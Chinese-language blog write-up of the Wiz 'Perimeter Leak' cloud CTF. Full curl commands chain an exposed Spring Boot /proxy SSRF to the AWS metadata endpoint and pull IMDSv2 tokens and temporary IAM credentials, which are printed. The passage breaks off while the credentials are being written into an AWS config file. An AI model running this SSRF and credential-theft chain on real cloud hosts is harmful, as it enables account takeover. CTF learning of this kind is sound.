<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="请屏蔽失望吧。">
    <meta name="author" content="Flow">
    
    <title>
        
            【WIZ】Perimeter Leak |
        
        Flowww&#39;s blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="https://cdn.jsdelivr.net/gh/lintian31/blog-image/blog-image/aaa.png">
    
    
<link rel="stylesheet" href="/font/css/fontawesome.min.css">

    
<link rel="stylesheet" href="/font/css/regular.min.css">

    
<link rel="stylesheet" href="/font/css/solid.min.css">

    
<link rel="stylesheet" href="/font/css/brands.min.css">

    
    <script class="keep-theme-configurations">
    const KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"example.com","root":"/","language":"zh-CN","path":"search.xml"}
    KEEP.theme_config = {"base_info":{"primary_color":"#0066cc","title":"Flowww's blog","author":"Flow","avatar":"https://cdn.jsdelivr.net/gh/lintian31/blog-image/blog-image/aaa.png","logo":"https://cdn.jsdelivr.net/gh/lintian31/blog-image/blog-image/aaa.png","favicon":"https://cdn.jsdelivr.net/gh/lintian31/blog-image/blog-image/aaa.png"},"menu":{"home":"/","archives":"/archives","tags":"/tags","about":"/about"},"first_screen":{"enable":true,"background_img":"https://cdn.jsdelivr.net/gh/lintian31/blog-image/blog-image/20250112172909.png","background_img_dark":"/images/bg.svg","description":"请屏蔽失望。","hitokoto":false},"social_contact":{"enable":false,"links":{"github":null,"weixin":null,"qq":null,"weibo":null,"zhihu":null,"twitter":null,"x":null,"facebook":null,"email":null}},"scroll":{"progress_bar":false,"percent":false,"hide_header":true},"home":{"announcement":null,"category":false,"tag":true,"post_datetime":"updated"},"post":{"author_badge":{"enable":false,"level_badge":true,"custom_badge":["One","Two","Three"]},"word_count":{"wordcount":true,"min2read":false},"datetime_format":"YYYY-MM-DD","copyright_info":false,"share":false,"reward":{"enable":false,"img_link":null,"text":null}},"code_block":{"tools":{"enable":true,"style":"default"},"highlight_theme":"default"},"toc":{"enable":true,"number":true,"expand_all":false,"init_open":true,"layout":"right"},"website_count":{"busuanzi_count":{"enable":true,"site_uv":false,"site_pv":false,"page_pv":true}},"search":{"path":"search.json","field":"post","content":true,"format":"striptags"},"local_search":{"enable":true,"preload":true},"comment":{"enable":true,"use":"valine","valine":{"appid":"E3FHp0QEVFhY7p13mQXePdYC-gzGzoHsz","appkey":"hJxnDaGeKNxkzn9GLQS6pJD4","placeholder":"留下你的评论～","recordIP":true,"avatar":"robohash","avatar_cdn":"https://cravatar.cn/avatar/"},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null,"proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.21"},"waline":{"server_url":null,"reaction":false,"version":2},"giscus":{"repo":null,"repo_id":null,"category":"Announcements","category_id":null,"reactions_enabled":false},"artalk":{"server":null},"disqus":{"shortname":null}},"rss":{"enable":false},"lazyload":{"enable":false},"cdn":{"enable":false,"provider":"cdnjs"},"pjax":{"enable":false},"footer":{"since":2020,"word_count":false,"icp":{"enable":false,"record_code":null,"url":"https://beian.miit.gov.cn"},"site_deploy":{"enable":false,"provider":"github","url":null},"shields_style":{"enable":false,"custom":[{"link_url":null,"img_url":null}]}},"inject":{"enable":false,"css":[null],"js":[null]},"root":"","source_data":{},"version":"4.1.0"}
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"}
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"}
    KEEP.language_copy_copyright = {"copy":"复制版权信息","copied":"已复制","title":"原文标题","author":"原文作者","link":"原文链接"}
  </script>
<meta name="generator" content="Hexo 7.1.1"></head>


<body>
<div class="progress-bar-container">
    

    
</div>



<main class="page-container border-box">
    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="https://cdn.jsdelivr.net/gh/lintian31/blog-image/blog-image/aaa.png">
                </a>
            
            <a class="site-name border-box" href="/">
               Flowww&#39;s blog
            </a>
        </div>

        <div class="right border-box">
            <div class="pc">
                <ul class="menu-list">
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                
                                首页
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                
                                归档
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/tags"
                            >
                                
                                标签
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/about"
                            >
                                
                                关于
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas search fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/"
                    >首页</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives"
                    >归档</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tags"
                    >标签</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/about"
                    >关于</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">
                

                    
<div class="fade-in-down-animation">
    <div class="post-page-container border-box">
        <div class="post-content-container border-box">
            

            <div class="post-content-bottom border-box">
                
                    <div class="post-title">
                        【WIZ】Perimeter Leak
                    </div>
                

                
                    <div class="post-header border-box">
                        
                            <div class="avatar-box border-box">
                                <img src="https://cdn.jsdelivr.net/gh/lintian31/blog-image/blog-image/aaa.png">
                            </div>
                        
                        <div class="info-box">
                            <div class="author border-box">
                                <span class="name">Flow</span>
                                
                            </div>
                            <div class="meta-info border-box">
                                

<div class="post-meta-info-container border-box post">
    <div class="post-meta-info border-box">
        

        
            <span class="meta-info-item post-create-date">
                <i class="icon fa-solid fa-calendar-plus"></i>&nbsp;
                <span class="datetime">2025-11-19</span>
            </span>

            <span class="meta-info-item post-update-date">
                <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                <span class="datetime" data-updated="Wed Nov 19 2025 00:55:03 GMT+0800">2025-11-19</span>
            </span>
        

        

        
            <span class="post-tag meta-info-item border-box">
                <ul class="post-tag-ul">
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/%E5%AD%A6%E4%B9%A0/">学习</a></li>
                        
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/%E4%BA%91/">云</a></li>
                        
                    
                </ul>
            </span>
        

        
        
        
        
            <span class="meta-info-item post-pv">
                <i class="icon fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
            </span>
        
    </div>

    
</div>

                            </div>
                        </div>
                    </div>
                

                <div class="post-content keep-markdown-body">
                    

                    <p>题目地址：<a class="link"   target="_blank" rel="noopener" href="https://cloudsecuritychampionship.com/challenge/1" >https://cloudsecuritychampionship.com/challenge/1<i class="fas fa-external-link-alt"></i></a></p>
<p>WP参考：</p>
<p><a class="link"   target="_blank" rel="noopener" href="https://www.techwithtyler.dev/cloud-security/capture-the-flags-ctfs/wiz-the-ultimate-cloud-security-championship/june-2025-perimeter-leak" >https://www.techwithtyler.dev/cloud-security/capture-the-flags-ctfs/wiz-the-ultimate-cloud-security-championship/june-2025-perimeter-leak<i class="fas fa-external-link-alt"></i></a></p>
<p>一个云ctf的靶场，之前朋友推荐的，突然想起来，好久没有做靶场了。</p>
<p>这个平台好像是一个月出一个和云相关的题目，最后是要拿到云容器里面的flag，看了第一关的wp，和aws s3存储桶相关，里面涉及一些存储桶相关的知识，那么就趁这个机会学习一下这方面的知识</p>
<p>第一个挑战难度算简单的</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">【Perimeter Leak】</span><br><span class="line">After weeks of exploits and privilege escalation you&#x27;ve gained access to what you hope is the final server that you can then use to extract out the secret flag from an S3 bucket.</span><br><span class="line"></span><br><span class="line">It won&#x27;t be easy though. The target uses an AWS data perimeter to restrict access to the bucket contents.</span><br></pre></td></tr></table></figure>

<p>就是有一个springboot actuator泄漏，&#x2F;health，&#x2F;env，&#x2F;mappings这些端点都泄漏了，根据提示大概思路就是从这里泄漏里面找到和存储桶有关的信息，最后读到存储桶里面的数据</p>
<p>那么直接访问几个actuator相关的url，去到env端点</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">      &quot;name&quot;: &quot;systemEnvironment&quot;,</span><br><span class="line">      &quot;properties&quot;: &#123;</span><br><span class="line">        。。。</span><br><span class="line">        &quot;BUCKET&quot;: &#123;</span><br><span class="line">          &quot;value&quot;: &quot;challenge01-470f711&quot;,</span><br><span class="line">          &quot;origin&quot;: &quot;System Environment Property \&quot;BUCKET\&quot;&quot;</span><br><span class="line">        &#125;,</span><br><span class="line">        。。。</span><br><span class="line">    &#125;,</span><br></pre></td></tr></table></figure>

<p>就能找到桶名是<code>challenge01-470f711</code>，拼接aws的域名，可以直接访问尝试</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ curl -I http://challenge01-470f711.s3.amazonaws.com</span><br><span class="line">HTTP/1.1 403 Forbidden</span><br><span class="line">x-amz-bucket-region: us-east-1</span><br><span class="line">x-amz-request-id: 86DBRNM7NBMG9D01</span><br><span class="line">x-amz-id-2: YE1IN1I+hBx1ZV5ftfYd3Km8pRqbNXeIU4KvqLCSla8+qXuER51ZH5fhNxUgx+ztZvjW1NDeSEk=</span><br><span class="line">Content-Type: application/xml</span><br><span class="line">Transfer-Encoding: chunked</span><br><span class="line">Date: Tue, 18 Nov 2025 06:52:28 GMT</span><br><span class="line">Server: AmazonS3</span><br></pre></td></tr></table></figure>

<p>存储桶确实存在，但是现在没有权限，然后下一步尝试用aws-cli连接，带上选项卡<code>--no-sign-request</code>尝试匿名登陆</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ aws s3 ls s3://challenge01-470f711/ --no-sign-request</span><br><span class="line"></span><br><span class="line">An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied</span><br></pre></td></tr></table></figure>

<p>也是不允许的Access Denied</p>
<p>按正常做渗透这一步就需要多枚举不同的选项（<a class="link"   target="_blank" rel="noopener" href="https://docs.aws.amazon.com/cli/v1/reference/s3/ls.html" >官方使用手册<i class="fas fa-external-link-alt"></i></a>），获得这个桶的蛛丝马迹</p>
<p>结果是没有，回到springboot泄漏，<code>/actuator/mappings</code>这个展示了这个服务的一些端点信息，包括路由，请求方法，请求参数等</p>
<p>wp里面提供了jq语法直接列出所有可以看到的路由</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ curl -s https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/actuator/mappings | jq &#x27;.contexts.spring.mappings.dispatcherServlets.dispatcherServlet[]?.details?.requestMappingConditions?.patterns[]?&#x27;</span><br><span class="line">&quot;/actuator/configprops&quot;</span><br><span class="line">&quot;/actuator/scheduledtasks&quot;</span><br><span class="line">&quot;/actuator/metrics/&#123;requiredMetricName&#125;&quot;</span><br><span class="line">&quot;/actuator/caches&quot;</span><br><span class="line">&quot;/actuator/env/&#123;toMatch&#125;&quot;</span><br><span class="line">&quot;/actuator&quot;</span><br><span class="line">&quot;/actuator/sbom/&#123;id&#125;&quot;</span><br><span class="line">&quot;/actuator/beans&quot;</span><br><span class="line">&quot;/actuator/caches/&#123;cache&#125;&quot;</span><br><span class="line">&quot;/actuator/threaddump&quot;</span><br><span class="line">&quot;/actuator/configprops/&#123;prefix&#125;&quot;</span><br><span class="line">&quot;/actuator/loggers&quot;</span><br><span class="line">&quot;/actuator/health/**&quot;</span><br><span class="line">&quot;/actuator/metrics&quot;</span><br><span class="line">&quot;/actuator/threaddump&quot;</span><br><span class="line">&quot;/actuator/info&quot;</span><br><span class="line">&quot;/actuator/caches/&#123;cache&#125;&quot;</span><br><span class="line">&quot;/actuator/loggers/&#123;name&#125;&quot;</span><br><span class="line">&quot;/actuator/mappings&quot;</span><br><span class="line">&quot;/actuator/loggers/&#123;name&#125;&quot;</span><br><span class="line">&quot;/actuator/caches&quot;</span><br><span class="line">&quot;/actuator/sbom&quot;</span><br><span class="line">&quot;/actuator/env&quot;</span><br><span class="line">&quot;/actuator/conditions&quot;</span><br><span class="line">&quot;/actuator/health&quot;</span><br><span class="line">&quot;/error&quot;</span><br><span class="line">&quot;/proxy&quot;</span><br><span class="line">&quot;/&quot;</span><br><span class="line">&quot;/error&quot;</span><br></pre></td></tr></table></figure>

<p>关注到一个路由<code>/proxy</code>，参数是<code>url</code></p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">              <span class="attr">&quot;predicate&quot;</span><span class="punctuation">:</span> <span class="string">&quot;&#123; [/proxy], params [url]&#125;&quot;</span><span class="punctuation">,</span></span><br><span class="line">              <span class="attr">&quot;handler&quot;</span><span class="punctuation">:</span> <span class="string">&quot;challenge.Application#proxy(String)&quot;</span><span class="punctuation">,</span></span><br><span class="line">              <span class="attr">&quot;details&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">                <span class="attr">&quot;handlerMethod&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">                  <span class="attr">&quot;className&quot;</span><span class="punctuation">:</span> <span class="string">&quot;challenge.Application&quot;</span><span class="punctuation">,</span></span><br><span class="line">                  <span class="attr">&quot;name&quot;</span><span class="punctuation">:</span> <span class="string">&quot;proxy&quot;</span><span class="punctuation">,</span></span><br><span class="line">                  <span class="attr">&quot;descriptor&quot;</span><span class="punctuation">:</span> <span class="string">&quot;(Ljava/lang/String;)Ljava/lang/String;&quot;</span></span><br><span class="line">                <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">                <span class="attr">&quot;requestMappingConditions&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">                  <span class="attr">&quot;consumes&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">                  <span class="attr">&quot;headers&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">                  <span class="attr">&quot;methods&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">                  <span class="attr">&quot;params&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">                    <span class="punctuation">&#123;</span></span><br><span class="line">                      <span class="attr">&quot;name&quot;</span><span class="punctuation">:</span> <span class="string">&quot;url&quot;</span><span class="punctuation">,</span></span><br><span class="line">                      <span class="attr">&quot;negated&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span></span><br><span class="line">                    <span class="punctuation">&#125;</span></span><br><span class="line">                  <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">                  <span class="attr">&quot;patterns&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">                    <span class="string">&quot;/proxy&quot;</span></span><br><span class="line">                  <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">                  <span class="attr">&quot;produces&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="punctuation">]</span></span><br><span class="line">                <span class="punctuation">&#125;</span></span><br><span class="line">              <span class="punctuation">&#125;</span></span><br><span class="line">            <span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>

<p>妥妥ssrf，拿去访问云平台信息接口 169.254.169.254</p>
<p>补充一下这块知识，可以访问的路由有</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">// 获取相关元数据</span><br><span class="line">http://169.254.169.254/latest/meta-data/</span><br><span class="line">http://169.254.169.254/latest/user-data/</span><br><span class="line">http://169.254.169.254/latest/dynamic/</span><br><span class="line"></span><br><span class="line">// 获取IAM Role名称</span><br><span class="line">http://169.254.169.254/latest/meta-data/iam/security-credentials/</span><br><span class="line"></span><br><span class="line">// 获取角色临时凭证</span><br><span class="line">http://169.254.169.254/latest/meta-data/iam/security-credentials/&#123;rolename&#125;</span><br><span class="line"></span><br><span class="line">// 获取网络信息，利于内网探测</span><br><span class="line">http://169.254.169.254/latest/meta-data/network/interfaces/macs/</span><br><span class="line">http://169.254.169.254/latest/meta-data/network/interfaces/macs/&lt;mac&gt;/vpc-id</span><br><span class="line">http://169.254.169.254/latest/meta-data/network/interfaces/macs/&lt;mac&gt;/subnet-id</span><br><span class="line"></span><br><span class="line">// 获取公私IP</span><br><span class="line">http://169.254.169.254/latest/meta-data/public-ipv4</span><br><span class="line">http://169.254.169.254/latest/meta-data/local-ipv4</span><br><span class="line"></span><br><span class="line">// 获取镜像、实例类型、启动配置</span><br><span class="line">http://169.254.169.254/latest/meta-data/ami-id</span><br><span class="line">http://169.254.169.254/latest/meta-data/instance-id</span><br><span class="line">http://169.254.169.254/latest/meta-data/instance-type</span><br></pre></td></tr></table></figure>

<p>然后这里还有关于IMDSv1和IMDSv2的区别，这里有个[教程][<a class="link"   target="_blank" rel="noopener" href="https://security.kpingfan.com/02.ec2-security/01.metadata-service/]" >https://security.kpingfan.com/02.ec2-security/01.metadata-service/]<i class="fas fa-external-link-alt"></i></a> 写的很清晰</p>
<p>有些云机器设置了IMDSv2需要有session token才能访问，所以要获取token才能获取数据</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">// 获取Token</span><br><span class="line">TOKEN=`curl -X PUT &quot;http://169.254.169.254/latest/api/token&quot; \</span><br><span class="line">  -H &quot;X-aws-ec2-metadata-token-ttl-seconds: 21600&quot;`</span><br><span class="line">  </span><br><span class="line">// 带上token获取数据</span><br><span class="line">curl -H &quot;X-aws-ec2-metadata-token: $TOKEN&quot; \</span><br><span class="line">  http://169.254.169.254/latest/meta-data/</span><br></pre></td></tr></table></figure>

<p>以上主要是aws产品的路由，还有别的厂商的可能路由不一样，如果现实遇到了再去查吧</p>
<p>所以回到这个靶场，结合ssrf访问云服务的元数据端点</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ curl &quot;https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=http://169.254.169.254/latest/meta-data/&quot;</span><br><span class="line">HTTP error: 401 Unauthorized</span><br></pre></td></tr></table></figure>

<p>还是没有权限，尝试获取token，带上token再访问</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ TOKEN=`curl -X PUT &quot;https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=http://169.254.169.254/latest/api/token&quot; -H &quot;X-aws-ec2-metadata-token-ttl-seconds: 21600&quot;`</span><br><span class="line"><span class="meta prompt_">  % </span><span class="language-bash">Total    % Received % Xferd  Average Speed   Time    Time     Time  Current</span></span><br><span class="line">                                 Dload  Upload   Total   Spent    Left  Speed</span><br><span class="line">100    56  100    56    0     0     35      0  0:00:01  0:00:01 --:--:--    35</span><br><span class="line">➜  ~ echo $TOKEN</span><br><span class="line">AQAEAGNKTypshAzwdBa5XYUz2Pc0aSyvBcLuNb8DzKd4lO6qs1iXbQ==</span><br></pre></td></tr></table></figure>

<p>这下能拿到信息了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ curl -H &quot;X-aws-ec2-metadata-token: $TOKEN&quot; &quot;https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=http://169.254.169.254/latest/meta-data/&quot;</span><br><span class="line">ami-id</span><br><span class="line">ami-launch-index</span><br><span class="line">ami-manifest-path</span><br><span class="line">block-device-mapping/</span><br><span class="line">。。。</span><br></pre></td></tr></table></figure>

<p>下一步获取角色名字</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ curl -H &quot;X-aws-ec2-metadata-token: $TOKEN&quot; &quot;https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/&quot;</span><br><span class="line"></span><br><span class="line">challenge01-5592368%</span><br></pre></td></tr></table></figure>

<p>看看能不能获取临时凭证</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ curl -H &quot;X-aws-ec2-metadata-token: $TOKEN&quot; &quot;https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=http://169.254.169.254//latest/meta-data/iam/security-credentials/challenge01-5592368&quot;</span><br><span class="line">&#123;</span><br><span class="line">  &quot;Code&quot; : &quot;Success&quot;,</span><br><span class="line">  &quot;LastUpdated&quot; : &quot;2025-11-18T08:04:55Z&quot;,</span><br><span class="line">  &quot;Type&quot; : &quot;AWS-HMAC&quot;,</span><br><span class="line">  &quot;AccessKeyId&quot; : &quot;ASIARK7LBOHXNCMTLSXT&quot;,</span><br><span class="line">  &quot;SecretAccessKey&quot; : &quot;ARHYMMJL7N1Vpsjre7nJTobcHmwfoSdjSqqNG6ON&quot;,</span><br><span class="line">  &quot;Token&quot; : &quot;IQoJb3JpZ2luX2VjEPn//////////wEaCXVzLWVhc3QtMSJHMEUCIQCQXX3p3qAkedrgYd+ABa8it55Lor1O/vRUSgRHX19yzgIgIHvyT62g2un+9LqtmmK7SG0dQk/EC2MXC0mMgR/zbBcqwQUIwf//////////ARAAGgwwOTIyOTc4NTEzNzQiDIBafVZnTctpiTuubiqVBdJFgfZNm+RSjvpioxrUGeZ+FF3l8kQWTVKARz5/byLAPmFLlHS8CvG/kTqQjmWR9Ud14JKpqwHo95mtuyPlJP2Wa8iHW9gZJlkyRA8Y94oY2Bkx6mFSklJ4ZEwf/KzwbIKisOoYohl+bc7mJVjkQ6tzoqYjkAbYTJYGIGACqIXKXJRG4UprEc60WNhI6tl9ShaPYFeRNYWut7furpFwHhQhwjBI7oY8y3+bszfg6w/AbUpbt8wKTPcJAvU3rXqX0QeEniLcvYoPcctjL+LrgCRx7pT0aXI3pdmhCPkL9RpTBiKDsWqxCR/SWeN75XCVPtPACzj7sD0uZsfgkazxobOWP10GbDmvyIg+bdT6jx7dc0zqLQqz8kMuzzHjqlJlZ/WPWWuXh9Lttc+IDF3p6kwLOZ3IeXNgQE/4pIJA+b0l6G8vQ5NH+DSigiJUD6KC87fJ0i7ldXZzH5l+CI0sZRvyAT3SOzbGB/nMQbd/Vw9RtyoUhycEDPYNlt+4sdeN7t0ED8KHdj1h7rthIONlxHJkUTS+mOumorMzJPNiUPQnhPVyNPAcGXVJ8X1Pn2UP+mUPzoqZ13NUQVZd5Dgv5IXCogzL49nF7HDqlaYssbZSkqF/qKfCUi0EQ/jJj3Z5Knk+fcW0dgK8sSTpnqTG7YZO8I1vF1zU1Kaf5zRsA0esMoZi9CZSNL9aFPKvWf1GbkkW2f+qnRLLowHvsqFI7xHXQ7jUSgAR8dPTvI8RWBK/j48+jJ0YKtDFMjRVqPU4xsFoytkh+AEe4+WtSl/zZ/5jyW6/eZMdV+ugDsWqklUmZM6+rFNP8A3VfYiDC9VisqsNCWPvvdmkqFDj6y/cbsPxalJfoY0H+mwDL2GYigWNrAzc1aswtNHwyAY6sQEBqIb/CtsIklKyrjdGhS5H6VNxJAS998XyqSarhiP40mwOcVzZ3ciNxrZcCWwRimV6QfgiupkLMX2+zVVN/W8DvdGMHskJ+dgwnaygt+QOh45Tbj9NWO40aGU3ugY7Qt2a/ACxsY4aKwF/jdcHINypJdvRxMla/8VWS72t6fCWQsXTF2jnAgavgWTQxyyjrYHlgZpuJF9DgzOVk0EMAXrid8DeLi3NE2q9GTm9BZOWdME=&quot;,</span><br><span class="line">  &quot;Expiration&quot; : &quot;2025-11-18T14:15:02Z&quot;</span><br><span class="line">&#125;%</span><br></pre></td></tr></table></figure>

<p>成功获取到临时凭证，这里需要编辑两个文件</p>
<p><code>~/.aws/credentials</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">[c1]</span><br><span class="line">aws_access_key_id = ASIARK7LBOHXNCMTLSXT</span><br><span class="line">aws_secret_access_key = ARHYMMJL7N1Vpsjre7nJTobcHmwfoSdjSqqNG6ON</span><br><span class="line">aws_session_token = 